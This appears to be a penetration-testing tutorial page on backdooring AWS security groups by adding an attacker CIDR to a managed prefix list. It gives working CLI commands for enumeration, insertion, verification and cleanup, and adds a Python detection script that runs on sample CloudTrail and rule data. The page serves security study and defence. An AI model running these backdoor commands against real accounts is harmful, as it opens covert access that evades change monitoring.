AWS - Security Group Backdoor via Managed Prefix Lists
{{#include ../../../../banners/hacktricks-training.md}}
Summary
Abuse customer-managed Prefix Lists to create a stealthy access path. A security group (SG) rule can reference a managed Prefix List instead of a literal CIDR; the SG then allows whatever CIDRs the list currently contains. Anyone who can modify that list (ec2:ModifyManagedPrefixList) can silently add attacker-controlled CIDRs, and every SG rule (and any route-table route) that references the list immediately honours the new ranges. The SG rule itself never changes, so controls that watch only AuthorizeSecurityGroupIngress/Egress or SG configuration drift see nothing.
Impact
- Instant expansion of allowed IP ranges for all SGs referencing the prefix list, bypassing change controls that only monitor SG edits.
- Enables persistent ingress/egress backdoors: keep the malicious CIDR hidden in the prefix list while the SG rule appears unchanged.
Requirements
- IAM permissions:
  - ec2:DescribeManagedPrefixLists
  - ec2:GetManagedPrefixListEntries
  - ec2:ModifyManagedPrefixList
  - ec2:DescribeSecurityGroups / ec2:DescribeSecurityGroupRules (to identify attached SGs)
- Optional: ec2:CreateManagedPrefixList if creating a new one for testing.
- Environment: At least one SG rule referencing the target customer-managed Prefix List.
Variables
REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor - allow attacker"
Attack Steps
1) Enumerate candidate prefix lists and consumers
aws ec2 describe-managed-prefix-lists \
--region "$REGION" \
--query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
--output table
aws ec2 get-managed-prefix-list-entries \
--prefix-list-id "$PREFIX_LIST_ID" \
--region "$REGION" \
--query 'Entries[*].[Cidr,Description]'
To confirm which SG rules rely on the list, filter the output of aws ec2 describe-security-group-rules on its PrefixListId field (for example --query 'SecurityGroupRules[?PrefixListId==`'"$PREFIX_LIST_ID"'`]'), or use aws ec2 describe-security-groups with the filters ip-permission.prefix-list-id (ingress) and egress.ip-permission.prefix-list-id (egress). Lists referenced only by egress rules are just as useful: they let a compromised host talk out to the attacker CIDR.
2) Add attacker CIDR to the prefix list
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
--region "$REGION"
3) Validate propagation to security groups
aws ec2 describe-security-group-rules \
--region "$REGION" \
--query 'SecurityGroupRules[?PrefixListId==`'"$PREFIX_LIST_ID"'`].{SG:GroupId,Rule:SecurityGroupRuleId,Egress:IsEgress,Proto:IpProtocol,From:FromPort,To:ToPort,Description:Description}' \
--output table
Traffic from $ENTRY_CIDR is now allowed on every port range listed above, wherever the prefix list is referenced (commonly outbound rules on egress proxies or inbound rules on shared services). The list briefly shows State modify-in-progress before settling on modify-complete; wait for that before testing. The addition fails if the list is already at MaxEntries, and raising the limit (modify-managed-prefix-list --max-entries) is a separate, more noticeable change because every entry in a referenced list counts against the SG rule quota of each SG that uses it.
Evidence
- get-managed-prefix-list-entries reflects the attacker CIDR and description.
- describe-security-group-rules still shows the original SG rule referencing the prefix list (no SG modification recorded), yet traffic from the new CIDR succeeds.
- In CloudTrail the only trace is a ModifyManagedPrefixList event; no AuthorizeSecurityGroupIngress/Egress event is generated for the affected SGs.
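Added example (not part of the original page): the detection counterpart to steps 2 and 3 and to the evidence above. It takes CloudTrail ModifyManagedPrefixList records plus the JSON that describe-security-group-rules returns, and expands each added CIDR into the SG rules it silently widened, flagging CIDRs outside an approved set. Both inputs are constructed samples; the requestParameters layout (a ModifyManagedPrefixListRequest wrapper holding an AddEntry list) is assumed from CloudTrail's EC2 query-API encoding and should be checked against a real record from your trail.

```python
import ipaddress

# Constructed sample CloudTrail records. The ModifyManagedPrefixListRequest /
# AddEntry layout is an assumption about CloudTrail's EC2 request encoding.
SAMPLE_CLOUDTRAIL = [
    {
        "eventName": "ModifyManagedPrefixList",
        "eventSource": "ec2.amazonaws.com",
        "awsRegion": "us-east-1",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops-bot"},
        "requestParameters": {
            "ModifyManagedPrefixListRequest": {
                "PrefixListId": "pl-0123456789abcdef0",
                "CurrentVersion": 3,
                "AddEntry": [
                    {"tag": 1, "Cidr": "203.0.113.7/32",
                     "Description": "Backdoor - allow attacker"}
                ],
            }
        },
    },
    {   # benign SG edit: this is the kind of event SG-only monitoring catches
        "eventName": "AuthorizeSecurityGroupIngress",
        "eventSource": "ec2.amazonaws.com",
        "awsRegion": "us-east-1",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
        "requestParameters": {"groupId": "sg-0fedcba9876543210"},
    },
]

# Constructed sample of `aws ec2 describe-security-group-rules` output.
SAMPLE_SG_RULES = {
    "SecurityGroupRules": [
        {"SecurityGroupRuleId": "sgr-0a1", "GroupId": "sg-0abc123456789def0",
         "IsEgress": False, "IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "PrefixListId": "pl-0123456789abcdef0", "Description": "SSH from corp"},
        {"SecurityGroupRuleId": "sgr-0a2", "GroupId": "sg-0abc123456789def0",
         "IsEgress": False, "IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "CidrIpv4": "10.0.0.0/8", "Description": "HTTPS from VPC"},
        {"SecurityGroupRuleId": "sgr-0b1", "GroupId": "sg-0111222333444555a",
         "IsEgress": True, "IpProtocol": "-1", "FromPort": -1, "ToPort": -1,
         "PrefixListId": "pl-0123456789abcdef0", "Description": "egress proxy"},
    ]
}

# Constructed: networks that are allowed to appear in this prefix list.
APPROVED_NETWORKS = [ipaddress.ip_network("198.51.100.0/24"),
                     ipaddress.ip_network("10.0.0.0/8")]


def prefix_list_additions(events):
    """Extract every CIDR added through ModifyManagedPrefixList."""
    additions = []
    for ev in events:
        if ev.get("eventName") != "ModifyManagedPrefixList":
            continue
        req = ev.get("requestParameters", {}).get("ModifyManagedPrefixListRequest", {})
        actor = ev.get("userIdentity", {}).get("arn", "unknown")
        for entry in req.get("AddEntry", []):
            additions.append({"prefix_list_id": req.get("PrefixListId"),
                              "cidr": entry["Cidr"],
                              "description": entry.get("Description", ""),
                              "actor": actor})
    return additions


def rules_by_prefix_list(sg_rules_output):
    """Index SG rules by the prefix list they reference (rules with literal CIDRs are skipped)."""
    index = {}
    for rule in sg_rules_output.get("SecurityGroupRules", []):
        pl = rule.get("PrefixListId")
        if pl:
            index.setdefault(pl, []).append(rule)
    return index


def is_approved(cidr, approved=APPROVED_NETWORKS):
    """True when the CIDR lies entirely inside one approved network of the same IP version."""
    net = ipaddress.ip_network(cidr, strict=False)
    return any(net.version == a.version and net.subnet_of(a) for a in approved)


def effective_sg_changes(events, sg_rules_output, approved=APPROVED_NETWORKS):
    """Expand each prefix-list addition into the SG rules it widened: the change
    an SG-only monitor would have needed to see but never gets an event for."""
    index = rules_by_prefix_list(sg_rules_output)
    findings = []
    for add in prefix_list_additions(events):
        for rule in index.get(add["prefix_list_id"], []):
            findings.append({
                "group_id": rule["GroupId"],
                "rule_id": rule["SecurityGroupRuleId"],
                "direction": "egress" if rule.get("IsEgress") else "ingress",
                "protocol": rule.get("IpProtocol"),
                "ports": (rule.get("FromPort"), rule.get("ToPort")),
                "cidr": add["cidr"],
                "actor": add["actor"],
                "approved": is_approved(add["cidr"], approved),
            })
    return findings


if __name__ == "__main__":
    for f in effective_sg_changes(SAMPLE_CLOUDTRAIL, SAMPLE_SG_RULES):
        flag = "OK   " if f["approved"] else "ALERT"
        print(f"{flag} {f['group_id']} {f['direction']} {f['protocol']} "
              f"{f['ports']} now allows {f['cidr']} (via {f['actor']})")
```

On the sample input the single prefix-list addition yields two findings, one per referencing rule (SSH ingress on the first SG and all-traffic egress on the second), both flagged because 203.0.113.7/32 is outside the approved networks. Feeding real data is a matter of replacing the two constants with the output of a CloudTrail lookup and of describe-security-group-rules.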
Cleanup
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--remove-entries Cidr="$ENTRY_CIDR" \
--region "$REGION"
{{#include ../../../../banners/hacktricks-training.md}}